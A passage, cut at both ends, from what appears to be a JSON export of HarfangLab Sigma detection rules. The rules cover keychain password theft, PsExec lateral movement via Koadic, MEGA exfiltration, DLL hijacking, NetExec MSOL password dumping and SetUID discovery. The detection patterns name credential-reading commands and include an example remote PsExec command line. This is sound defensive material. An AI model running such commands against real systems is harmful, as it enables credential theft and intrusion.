"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "454ab28f-f8cd-420f-8c76-62220807a066",
"rule_name": "Data Possibly Exfiltrated via PowerShell over SMB",
"rule_description": "Detects suspicious file copies using PowerShell over SMB.\nAttackers can use this technique as SMB traffic is often allowed on networks and PowerShell usage allows a Living-of-the-Land approach.\nIt is recommended to investigate the PowerShell script, the copied files as well as the PowerShell process ancestors to determine the legitimacy of this action.\n",
"rule_creation_date": "2022-09-27",
"rule_modified_date": "2025-11-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1048.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "45922484-daf1-46c5-b3fb-d9357d117e41",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626287Z",
"creation_date": "2026-03-23T11:45:34.626289Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626293Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/",
"https://unit42.paloaltonetworks.com/north-korean-threat-actors-lure-tech-job-seekers-as-fake-recruiters/",
"https://www.trendmicro.com/en_se/research/25/i/an-mdr-analysis-of-the-amos-stealer-campaign.html",
"https://attack.mitre.org/techniques/T1555/001/"
],
"name": "t1564_001_security_password_listed.yml",
"content": "title: Password Discovered from Keychain via security\nid: 45922484-daf1-46c5-b3fb-d9357d117e41\ndescription: |\n Detects the usage of the security binary to gather password stored in keychain files.\n Adversaries may access keychain files in order to gather sensitive information such as passwords.\n It is recommended to check for other suspicious activities by the parent process.\nreferences:\n - https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/\n - https://unit42.paloaltonetworks.com/north-korean-threat-actors-lure-tech-job-seekers-as-fake-recruiters/\n - https://www.trendmicro.com/en_se/research/25/i/an-mdr-analysis-of-the-amos-stealer-campaign.html\n - https://attack.mitre.org/techniques/T1555/001/\ndate: 2024/06/18\nmodified: 2026/01/06\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1555.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n ProcessName: 'security'\n CommandLine|contains: 'find-generic-password'\n Ancestors|contains:\n # folder\n - '/Volumes/'\n - '/private/tmp/'\n - '/private/var/tmp/'\n - '/private/var/folder/'\n - '/private/etc/'\n - '/Users/'\n - '/private/var/root'\n # binary\n - 'osascript'\n - 'python'\n\n exclusion_zsh:\n ParentImage: '/Users/*/.local/bin/zsh (qterm)'\n\n exclusion_copilot:\n ProcessGrandparentImage: '/Users/*/.local/share/gh/extensions/gh-copilot/gh-copilot'\n\n exclusion_appuninstaller:\n ProcessParentImage: '/Users/*/Library/Application Support/Setapp/LaunchAgents/Setapp.app/Contents/Resources/SetappUninstaller.app/Contents/MacOS/SetappUninstaller'\n\n exclusion_node:\n ProcessParentCommandLine|startswith: 'node /Users/*/.nvm/versions/node/v*/bin/appcenter codepush release-react '\n\n exclusion_amazonq:\n ProcessParentImage:\n - '/private/var/folders/*/Amazon Q.app/Contents/MacOS/q'\n - '/Applications/Amazon Q.app/Contents/MacOS/q'\n ProcessCommandLine|contains: '/usr/bin/security find-generic-password -s codewhisperer:'\n\n exclusion_homebrew:\n Ancestors|contains: '/opt/homebrew/'\n\n exclusion_interactive:\n Ancestors|startswith:\n - '/bin/zsh|/usr/bin/login|'\n - '/bin/bash|/bin/zsh|/usr/bin/login|'\n - '/bin/zsh|/bin/zsh|/usr/bin/login|'\n - '/Users/*/.local/bin/zsh (kiro-cli-term)|/usr/bin/login|'\n - '/Applications/Kiro CLI.app/Contents/MacOS/kiro-cli|/bin/zsh|/Users/*/.local/bin/zsh (kiro-cli-term)|/usr/bin/login|'\n\n exclusion_claude:\n CommandLine:\n - 'security find-generic-password -a * -w -s Claude Code'\n - 'security find-generic-password -a * -w -s Claude Code-credentials'\n\n exclusion_publisher:\n CommandLine: '/usr/bin/security find-generic-password -s Posit Publisher Safe Storage -wa credentials'\n ProcessParentImage|endswith: '/bin/publisher'\n\n exclusion_salesforce:\n CommandLine: '/usr/bin/security find-generic-password -a local -s sfdx -g'\n\n exclusion_cursor:\n CommandLine:\n - '/usr/bin/security find-generic-password -a cursor-user -s cursor-refresh-token -g'\n - '/usr/bin/security find-generic-password -a cursor-user -s cursor-access-token -g'\n - '/usr/bin/security find-generic-password -a cursor-user -s cursor-api-key -g'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "45922484-daf1-46c5-b3fb-d9357d117e41",
"rule_name": "Password Discovered from Keychain via security",
"rule_description": "Detects the usage of the security binary to gather password stored in keychain files.\nAdversaries may access keychain files in order to gather sensitive information such as passwords.\nIt is recommended to check for other suspicious activities by the parent process.\n",
"rule_creation_date": "2024-06-18",
"rule_modified_date": "2026-01-06",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1555.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "45caf93e-1781-482c-860b-80988fbec6b4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073265Z",
"creation_date": "2026-03-23T11:45:34.073267Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073271Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/offsecginger/koadic",
"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bitsadmin",
"https://attack.mitre.org/techniques/T1105/",
"https://attack.mitre.org/software/S0250/",
"https://attack.mitre.org/software/S0029/"
],
"name": "t1569_002_koadic_psexec.yml",
"content": "title: PSExec Executed via Koadic\nid: 45caf93e-1781-482c-860b-80988fbec6b4\ndescription: |\n Detects the execution of PSExec from the Sysinternals website as used per the HackTool Koadic.\n Koadic uses PSExec to execute arbitrary commands on remote systems and move laterally.\n It is recommended to check for suspicious activities by the process' parents and on the target system.\nreferences:\n - https://github.com/offsecginger/koadic\n - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bitsadmin\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/software/S0250/\n - https://attack.mitre.org/software/S0029/\ndate: 2021/02/22\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1569.002\n - attack.s0250\n - attack.s0029\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.Koadic\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # C:\\Windows\\system32\\cmd.exe /q /c \\\\live.sysinternals.com@SSL\\tools\\\\psexec.exe \\\\192.168.56.105 -u \"tata\\user\" -p user -accepteula hostname\n selection_bin:\n - Image|endswith: '\\cmd.exe'\n - OriginalFileName: 'Cmd.EXE'\n\n selection_cmd1:\n CommandLine|contains|all:\n - ' /q '\n - ' /c '\n - ' -accepteula '\n\n selection_cmd2:\n CommandLine|contains:\n - ' ??live.sysinternals.com@SSL\\tools??psexec.exe '\n - ' ??live.sysinternals.com\\tools??psexec.exe '\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "45caf93e-1781-482c-860b-80988fbec6b4",
"rule_name": "PSExec Executed via Koadic",
"rule_description": "Detects the execution of PSExec from the Sysinternals website as used per the HackTool Koadic.\nKoadic uses PSExec to execute arbitrary commands on remote systems and move laterally.\nIt is recommended to check for suspicious activities by the process' parents and on the target system.\n",
"rule_creation_date": "2021-02-22",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1569.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "45f5a596-6369-4f07-8000-7282b8fedc62",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.610578Z",
"creation_date": "2026-03-23T11:45:34.610582Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.610589Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://redcanary.com/blog/rclone-mega-extortion/",
"https://www.elastic.co/security-labs/unmasking-financial-services-intrusion-ref0657",
"https://attack.mitre.org/techniques/T1567/002/"
],
"name": "t1567_002_suspicious_megasync.yml",
"content": "title: Suspicious MEGA tools Execution\nid: 45f5a596-6369-4f07-8000-7282b8fedc62\ndescription: |\n Detects the execution of renamed MEGA tools or located in an abnormal path.\n Attackers may use a MEGA tool in order to exfiltrate data from a compromised network.\n It is recommended to check that the use of this tool is legitimate.\nreferences:\n - https://redcanary.com/blog/rclone-mega-extortion/\n - https://www.elastic.co/security-labs/unmasking-financial-services-intrusion-ref0657\n - https://attack.mitre.org/techniques/T1567/002/\ndate: 2021/09/30\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.exfiltration\n - attack.t1567.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.Mega\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n OriginalFileName:\n - 'MEGAsync.exe'\n - 'MEGAclient.exe'\n - 'MEGAcmd.exe'\n - 'MEGAcmdShell.exe'\n - 'MEGAcmdServer.exe'\n - 'MEGAcmdUpdater.exe'\n\n filter_legit_folder:\n Image:\n - '?:\\Users\\\\*\\AppData\\Local\\MEGAsync\\MEGAsync.exe'\n - '?:\\ProgramData\\MEGAsync\\MEGAsync.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\MEGAcmd\\\\*'\n - '?:\\ProgramData\\MEGAcmd\\\\*'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "45f5a596-6369-4f07-8000-7282b8fedc62",
"rule_name": "Suspicious MEGA tools Execution",
"rule_description": "Detects the execution of renamed MEGA tools or located in an abnormal path.\nAttackers may use a MEGA tool in order to exfiltrate data from a compromised network.\nIt is recommended to check that the use of this tool is legitimate.\n",
"rule_creation_date": "2021-09-30",
"rule_modified_date": "2025-02-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1567.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "45fe4a7d-bc95-4fd4-83e4-803986c6010f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.099219Z",
"creation_date": "2026-03-23T11:45:34.099221Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.099225Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_devicecredentialdeployment.yml",
"content": "title: DLL Hijacking via devicecredentialdeployment.exe\nid: 45fe4a7d-bc95-4fd4-83e4-803986c6010f\ndescription: |\n Detects potential Windows DLL Hijacking via devicecredentialdeployment.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'devicecredentialdeployment.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\DeviceCredential.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "45fe4a7d-bc95-4fd4-83e4-803986c6010f",
"rule_name": "DLL Hijacking via devicecredentialdeployment.exe",
"rule_description": "Detects potential Windows DLL Hijacking via devicecredentialdeployment.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "46210e9e-d4b8-466d-aa48-5786cbdea116",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091067Z",
"creation_date": "2026-03-23T11:45:34.091069Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091073Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/Pennyw0rth/NetExec/blob/1af282888cd514cf9b4a08ff7caeb26c64625d90/nxc/data/msol_dump/msol_dump.ps1",
"https://attack.mitre.org/techniques/T1555/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1555_netexec_msol_password.yml",
"content": "title: MSOL Password Dumped via NetExec\nid: 46210e9e-d4b8-466d-aa48-5786cbdea116\ndescription: |\n Detects a dump of the MSOL account's password performed using NetExec tools.\n The MSOL account is a highly privileged account used to synchronize on-premise Active Directory environments with Microsoft Entra Connect.\n NetExec is a tool intended to ease lateral movement, internal recon and credential gathering actions.\n It is recommended to investigate actions made by the child process and identify the source of the remote connection using authentication logs.\nreferences:\n - https://github.com/Pennyw0rth/NetExec/blob/1af282888cd514cf9b4a08ff7caeb26c64625d90/nxc/data/msol_dump/msol_dump.ps1\n - https://attack.mitre.org/techniques/T1555/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2024/07/23\nmodified: 2025/02/18\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1555\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.HackTool.NetExec\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains|all:\n - \"SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'\"\n - 'Write-Host \"[!] Error using xp_cmdshell to launch our decryption powershell\"'\n - 'Write-Host \"[*] Using xp_cmdshell to run some Powershell as the service user\"'\n - 'Write-Host \"[!] Error querying mms_management_agent\"'\n - 'Write-Host \"[*] Querying ADSync localdb (mms_management_agent)\"'\n\n condition: selection\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "46210e9e-d4b8-466d-aa48-5786cbdea116",
"rule_name": "MSOL Password Dumped via NetExec",
"rule_description": "Detects a dump of the MSOL account's password performed using NetExec tools.\nThe MSOL account is a highly privileged account used to synchronize on-premise Active Directory environments with Microsoft Entra Connect.\nNetExec is a tool intended to ease lateral movement, internal recon and credential gathering actions.\nIt is recommended to investigate actions made by the child process and identify the source of the remote connection using authentication logs.\n",
"rule_creation_date": "2024-07-23",
"rule_modified_date": "2025-02-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1555"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "46cc50ba-8674-4b25-b88f-d55e3a874f21",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.294148Z",
"creation_date": "2026-03-23T11:45:35.294156Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.294168Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1083/",
"https://attack.mitre.org/techniques/T1548/"
],
"name": "t1083_find_setuid_setgid_linux.yml",
"content": "title: SetUID and SetGID Files Discovered via find\nid: 46cc50ba-8674-4b25-b88f-d55e3a874f21\ndescription: |\n Detects the execution of 'find' with special arguments to discover files with the SetUID or SetGID access flag set.\n Those access flags allow a user to run a binary using the executable's owner or group permissions instead of its own.\n Attackers can use misconfigured SetUID or SetGID flags to execute a file with a higher privileged user and achieve privilege escalation.\n It is recommended to investigate the command-line and the ancestors of the find program, as well as suspicious executions following this discovery to determine if this action was legitimate.\nreferences:\n - https://attack.mitre.org/techniques/T1083/\n - https://attack.mitre.org/techniques/T1548/\ndate: 2023/01/03\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1083\n - attack.privilege_escalation\n - attack.defense_evasion\n - attack.t1548\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.LOLBin.Find\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_image:\n Image|endswith: '/find'\n CommandLine|contains: ' -perm '\n ParentImage|contains: '?'\n\n selection_perm:\n CommandLine|contains:\n # Symbolic mode\n - ' /u=s'\n - ' -u=s'\n - ' /g=s'\n - ' -g=s'\n\n # Raw permission number\n - ' 4755'\n - ' -4755'\n - ' /4755'\n - ' 2755'\n - ' /2755'\n - ' -2755'\n\n # Masks\n - ' /?000'\n - ' -?000'\n - ' /0?000'\n - ' -0?000'\n - ' /00?000'\n - ' -00?000'\n\n exclusion_rapid7:\n ParentCommandLine:\n - 'bash -c LANG=C;LANGUAGE=en;find / *| xargs -0 -n 500 ls -lLdN'\n - \"/bin/bash -c echo 'Rapid7Echo'; (LANG=C;LANGUAGE=en;find / *| xargs -0 -n 500 ls -lLdN*\"\n\n exclusion_audit:\n # find /run/lock -xdev -type d ( -perm -0002 -a ! -perm -1000 ) -printf %p is %m should be 1777\\n\n CommandLine: '* -xdev -type d ( -perm -0002 -a ! -perm -1000 ) -printf %p is %m should be 1777\\n'\n\n exclusion_cis:\n # /bin/sh /tmp/CIS-Audit/cis-cat-full/sce/auditd_privilieged_commands_rules_file.sh\n ParentCommandLine|contains: 'auditd_privilieged_commands_rules_file.sh'\n\n exclusion_qualys:\n Ancestors|contains:\n - '/usr/local/qualys/cloud-agent/bin/qualys-scan-util'\n - '/usr/local/qualys/cloud-agent/bin/qualys-cloud-agent'\n\n exclusion_fstype:\n CommandLine|contains|all:\n - '-fstype nfs '\n - '-fstype nfs4 '\n - '-fstype gpfs '\n - '-fstype afs '\n - '-fstype secfs '\n - '-fstype smbfs '\n\n exclusion_xargs:\n ParentImage: '/usr/bin/xargs'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\n#level: low\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "46cc50ba-8674-4b25-b88f-d55e3a874f21",
"rule_name": "SetUID and SetGID Files Discovered via find",
"rule_description": "Detects the execution of 'find' with special arguments to discover files with the SetUID or SetGID access flag set.\nThose access flags allow a user to run a binary using the executable's owner or group permissions instead of its own.\nAttackers can use misconfigured SetUID or SetGID flags to execute a file with a higher privileged user and achieve privilege escalation.\nIt is recommended to investigate the command-line and the ancestors of the find program, as well as suspicious executions following this discovery to determine if this action was legitimate.\n",
"rule_creation_date": "2023-01-03",
"rule_modified_date": "2026-02-11",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.discovery",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1083",
"attack.t1548"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "46cddb02-e1a7-4b35-bd26-bb267f7f1f50",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.598163Z",
"creation_date": "2026-03-23T11:45:34.598169Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.598180Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1647/"
],
"name": "t1647_plutil_plist_modification.yml",
"content": "title: Plist File Modified via plutil\nid: 46cddb02-e1a7-4b35-bd26-bb267f7f1f50\ndescription: |\n Detects a suspicious modification of a plist file using plutil.\n Adversaries may modify key-value pairs in plist files to influence system behaviors, in order to hide the execution of an application or to run additional commands for persistence.\n It is recommended to check if the modification is legitimate.\nreferences:\n - https://attack.mitre.org/techniques/T1647/\ndate: 2024/06/20\nmodified: 2025/01/27\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1647\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.LOLBin.Plutil\n - classification.macOS.Behavior.DefenseEvasion\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection_bin:\n Image|endswith: '/plutil'\n CommandLine|contains:\n - 'replace'\n - 'insert'\n selection_path:\n - CommandLine|contains: # full path\n - '/Contents/Info.plist'\n - '/Library/Preferences/com.apple.dock.plist'\n - '/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm'\n - CommandLine|contains:\n - 'Info.plist'\n - 'com.apple.dock.plist'\n - 'com.apple.backgroundtaskmanagementagent/backgrounditems.btm'\n CurrentDirectory|contains: # relative path, use current directory\n - '/Applications/'\n - '/Library/Preferences/'\n - '/Library/Application Support/'\n condition: all of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "46cddb02-e1a7-4b35-bd26-bb267f7f1f50",
"rule_name": "Plist File Modified via plutil",
"rule_description": "Detects a suspicious modification of a plist file using plutil.\nAdversaries may modify key-value pairs in plist files to influence system behaviors, in order to hide the execution of an application or to run additional commands for persistence.\nIt is recommended to check if the modification is legitimate.\n",
"rule_creation_date": "2024-06-20",
"rule_modified_date": "2025-01-27",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1647"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "46d63e16-d3ad-475f-b398-cc1ad556bf8d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.597026Z",
"creation_date": "2026-03-23T11:45:34.597031Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.597044Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
